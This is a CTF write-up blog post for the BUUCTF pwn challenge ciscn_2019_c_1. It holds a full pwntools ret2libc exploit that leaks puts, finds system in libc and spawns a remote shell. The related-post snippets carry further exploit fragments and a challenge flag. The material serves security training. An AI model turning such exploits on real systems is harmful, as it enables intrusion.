BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】

已于 2022-12-12 11:47:41 修改
阅读量263 收藏
点赞数 1
分类专栏: pwn刷题笔记 文章标签: c语言 python
于 2022-12-06 08:52:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73149934/article/details/128182498
版权

保护

ida

encrypt()里有个get(s),可以栈溢出,确定题型ret2libc。

要先绕过main()的循环和if语句即v4=1,到达encrypt()。

可见encrypt()进行了加密操作,需要绕过加密,避免payload受损。

发现strlen(),进行字符串截断,执行break语句。

准备 

 exp

from pwn import*
from LibcSearcher import*
elf=ELF("/home/error/桌面/ciscn_2019_c_1")
context.log_level="debug"
#i=process("/home/error/桌面/ciscn_2019_c_1")
i=remote("node4.buuoj.cn",29583)
i.sendlineafter("Input your choice!\n",b"1")
i.recvline()

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
main=elf.sym["main"]
pop_rdi=0x0000000000400c83
ret=0x00000000004006b9

p1=b"\x00"+cyclic(0x50+8-1)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
i.sendline(p1)
puts_addr=u64(i.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(puts_addr))

libc=LibcSearcher("puts",puts_addr)
libc_base=puts_addr-libc.dump("puts")
sys_addr=libc_base+libc.dump("system")
she_addr=libc_base+libc.dump("str_bin_sh")
print(hex(sys_addr))
i.sendlineafter("Input your choice!\n",b"1")
i.recvline()

p2=b"\x00"+cyclic(0x50+8-1)+p64(ret)+p64(pop_rdi)+p64(she_addr)+p64(sys_addr)
#注意是Ubuntu 18,有栈对齐问题,这个点也困扰了我好一会
i.sendline(p2)
i.interactive()

思考

scanf函数用法:

C语言scanf函数用法完全攻略 (biancheng.net)

ubuntu18栈对齐问题:关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题 - ZikH26 - 博客园 (cnblogs.com)

X1NRI
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《pwn》ret2libc2—x64简答例题+脚本加解析
Aiyflwoers的博客
03-28 691
题目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
BUUCTF的第二题rip&一道ret2libc
最新发布
I_ET5u5的博客
12-11 257
buuctf的第二题和一道ret2libc的小难点
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 410
ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
BUUCTF--pwn--[OGeek2019]babyrop【ret2libc】
qq_73149934的博客
12-06 226
BUUCTF--pwn--[OGeek2019]babyrop
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn相关的工具的命令19_7_151
08-08
总的来说,这段描述涵盖了Pwn领域中利用返回导向编程进行ret2libc攻击的基本步骤,包括查找gadgets、分析ELF文件、利用GDB调试、构造payload以及理解动态链接库的工作原理。这些知识对于理解和实践安全漏洞利用至关...
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 241
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5850
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 580
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 248
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 375
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2407
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 309
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
【Pwn】什么是堆栈内存对齐
weixin_52553215的博客
03-05 1048
AND ESP 0XFFFFFFF0 主流编译器的编译规则规定 “ 程序访问的地址必须向16字节对齐(被16整除)” ,内存对齐之后可以提高访问效率。 对齐前:三次 对齐后:两次
PWN基础知识及基础栈溢出手法
山高路远
04-12 3915
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
ack_PCS = bit64 << (slave_W-1);
07-28
这段代码是关于ARM架构的程序,其中包含了一些函数和变量的定义。引用\[1\]是一个函数`SpiReverseBitOrder`,它接受一个16位的数据作为输入,并将其按位反转后返回一个8位的结果。引用\[2\]是关于ARM架构中栈布局的说明,其中提到了R11和PC的值保存在栈底,并给出了相应的指令。引用\[3\]是一个完整的exploit代码,用于攻击一个ARM架构的程序。其中包含了一些地址和payload的设置,以及调用shellcode的过程。 至于问题中的`ack_PCS = bit64 << (slave_W-1);`,这段代码没有在提供的引用中出现,所以无法给出具体的解释。请提供更多的上下文信息,以便我能够更好地回答你的问题。 #### 引用[.reference_title] - *1* [逆向-还原代码之bit-order (Arm 64)](https://blog.csdn.net/xiaozhiwise/article/details/128399013)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [mips&arm&aarch64-pwn初探](https://blog.csdn.net/seaaseesa/article/details/105281585)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值